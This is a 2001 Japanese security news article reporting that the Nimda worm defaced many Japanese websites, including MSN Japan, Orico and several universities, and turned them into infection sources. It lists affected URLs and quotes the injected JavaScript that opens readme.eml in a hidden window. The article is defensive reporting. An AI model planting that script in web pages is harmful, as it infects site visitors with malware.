msn、オリコをはじめとする多数のwebが改竄、感染の踏み台にされる(2001.9.19) | ScanNetSecurity[国内最大級のサイバーセキュリティ専門ポータルサイト]
2018.04.27(金)

msn、オリコをはじめとする多数のwebが改竄、感染の踏み台にされる(2001.9.19)

インシデント・事故 インシデント・情報漏えい

 Nimda によるweb改竄は、急激に広がっている。
 現在、編集部で確認したwebページは下記であるが、いくつかのサイトでは、トップページ以下複数のページが改竄されるなどの広がりをみせている。大手サイト、企業も感染しており、企業名やサイト名で安心してアクセスすると、被害を受けることになる。インターネット利用にあたっては、パッチをあてる、スクリプトをオフにするなどの自己防衛が不可欠となっている。

改竄されたページには、下記のスクリプトが埋め込まれている。
「<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no,top=6000,left=6000")</script></html>」

 感染したwebは、拡大しており、下記にあげるものは、ごく一部でしかない。

改竄され、踏み台となったweb
 ・msnトップページ
  http://www.msn.co.jp/
 ・オリコ
  http://www.orico.co.jp/
 ・オリコ
  http://www.orico.co.jp/senden/cm/e1.html
 ・山梨学院大学
  http://www.ygu.ac.jp/
 ・山梨学院大学法学部
  http://www.ygu.ac.jp/guide/hougakuseiji/index.html
 ・建設物価メディア株式会社
  http://www.kensetu-bukka-m.co.jp/
 ・建設物価メディア株式会社
  http://www.kensetu-bukka-m.co.jp/rireki/0109_edit_3.htm
 ・株式会社マウント富士インターネット
  http://www.mfi.or.jp/www/
 ・都留信用組合
  http://www.mfi.or.jp/w3/home0/tsurusin/
 ・RESORTHOTEL CAMELOT
  http://www.mfi.or.jp/camelot/main.htm
 ・株式会社ストローカー ジャパン
  http://www.mfi.or.jp/sjc/
 ・日本囲碁ソフト
  布石・定石パワー アップデートモジュールのダウンロード
  http://www.igosoft.co.jp/html/update/jpow2up.html
 ・囲碁ソフト 次の一手
  http://www.igosoft.co.jp/html/UteruNyu/keisan.htm
 ・株式会社エルミックシステム
  http://www.elmic.co.jp/japanese/index.html
 ・株式会社タイリクトラベル
  http://www.tairiku.co.jp/hotel/
 ・株式会社タイリクトラベル TE ANAU テアナウ ホテル料金一覧
  http://www.tairiku.co.jp/hotel/oceania/TEU_trf_A.html
 ・JTB GLOBAL ASSISTANCE
  http://www.jga.co.jp/Indexright.htm
 ・マックスバリュ東北株式会社
  http://www.mv-tohoku.co.jp/
 ・株式会社 日東物産
  http://www.prland.co.jp/
 ・株式会社 日本ユニオンシステム
  http://www.unionsys.co.jp/
 ・代官山美容外科
  http://www.mpint.co.jp/~dky/congress_J.htm
 ・RSoundLibrary
  http://www.crypton.co.jp/Web98/html/10380.html
 ・東京工業大学 井口家成 研究室HP内の個人ページ
  http://www.htsc.ap.titech.ac.jp/member/kawai/test.htm
 ・志學館学園
  http://www.jkajyo.ac.jp/
 ・志學館学園
  http://www.jkajyo.ac.jp/sgn/camp/13kimo.html
 ・キャリアプラザ名古屋支店
  http://www.hito-plaza.com/MM/news010914.htm
 ・早稲田大学 嘉納研究室
  http://www.kano.arch.waseda.ac.jp/
《ScanNetSecurity》

Scan PREMIUM 会員限定記事

もっと見る

Scan PREMIUM 会員限定記事特集をもっと見る

カテゴリ別新着記事

★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★
<b>★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★</b>

経営課題としてサイバーセキュリティに取り組む情報システム部門や、研究・開発・経営企画に携わる方へ向けた、創刊19年のセキュリティ情報サービス Scan PREMIUM を、貴社の事業リスク低減のためにご活用ください。

×